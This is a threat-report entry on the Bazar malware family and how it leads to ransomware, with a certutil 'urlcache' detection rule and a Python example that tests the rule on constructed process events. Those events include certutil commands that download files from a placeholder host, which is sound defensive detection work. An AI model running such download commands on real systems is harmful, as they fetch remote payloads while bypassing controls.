Relevant threats of 2021

Bazar

The Bazar family of malware continued to be active in 2021, spurring ransomware infections.

Editor’s note: While the detection opportunities and analysis on this page are still relevant, it has not been updated since 2022.

Analysis

The Bazar malware family was quite active in 2021, spreading via multiple delivery affiliates, including TA551 and BazaCall. There are many names for Bazar (sometimes referred to as “Baza”) floating around that refer to various parts of the intrusion chain. Bazar is relevant because of its role as a malware precursor, and many 2021 intrusions starting with Bazar led to ransomware like Ryuk and Conti. The Bazar malware family encompasses a loader, BazarLoader, and backdoor, BazarBackdoor. These components have been delivered via multiple delivery affiliates. As we discuss in the Affiliates section of this report, differentiating initial delivery affiliates from loaders and payloads will help you understand each phase of the threat and how to better protect your organization.

One affiliate we’ve been tracking for a while, TA551, began delivering Bazar during 2021. While TA551 relied on email attachments to deliver Bazar, another affiliate behind a 2021 phishing campaign known as BazaCall opted to trick users into calling a phone number sent in an email. After a victim called the number, an adversary provided step-by-step instructions that led to downloading Bazar malware. (Check out Brad Duncan’s video for an example of how this intrusion plays out.) Once BazaLoader was installed, BazaCall led to Cobalt Strike and, eventually, ransomware.

Detection opportunities

Microsoft Certificate Services using certutil.exe to initiate download

This detection analytic looks for instances of the Microsoft Certificate Utility (certutil.exe) initiating a download, a technique used to download Bazar payloads.

process == certutil.exe
&&
command_line_includes ('urlcache')
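The analytic above, implemented against constructed process-creation events as an added example (not code from the report or from Red Canary); the event field names image, command_line and parent are assumptions, and the sample command lines are constructed rather than captured from a real intrusion:

```python
# Added example: evaluate the "certutil.exe initiating a download" analytic
# (process == certutil.exe && command_line_includes('urlcache')) against
# constructed process-creation events. Field names are assumptions.
from dataclasses import dataclass
import ntpath


@dataclass
class ProcessEvent:
    image: str          # full path of the newly created process
    command_line: str   # its command line
    parent: str         # parent image name, kept only for analyst context


def matches_certutil_urlcache(ev: ProcessEvent) -> bool:
    """Return True when the event satisfies the analytic.

    The image is compared on its basename, case-insensitively, so that
    C:\\Windows\\System32\\certutil.exe and CERTUTIL.EXE both match, and the
    command line is searched case-insensitively for the 'urlcache' token.
    """
    name = ntpath.basename(ev.image).lower()
    return name == "certutil.exe" and "urlcache" in ev.command_line.lower()


# Constructed sample telemetry: two matches, one benign certutil use,
# and one non-certutil process that merely mentions the token.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -f http://example.invalid/a.bin C:\Users\Public\a.bin",
                 "cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\CERTUTIL.EXE",
                 r"CERTUTIL.EXE -URLCACHE -f http://example.invalid/b.bin b.bin",
                 "powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\Users\Public\a.bin SHA256",
                 "cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"cmd.exe /c echo urlcache",
                 "explorer.exe"),
]


def run_detection(events):
    """Return the events that match the analytic, in input order."""
    return [ev for ev in events if matches_certutil_urlcache(ev)]


if __name__ == "__main__":
    for ev in run_detection(SAMPLE_EVENTS):
        print(f"[certutil urlcache] parent={ev.parent} cmd={ev.command_line}")
```

The third and fourth constructed events show why the analytic keys on both the image name and the token: a hash check by certutil and an unrelated process that happens to echo "urlcache" both fall through.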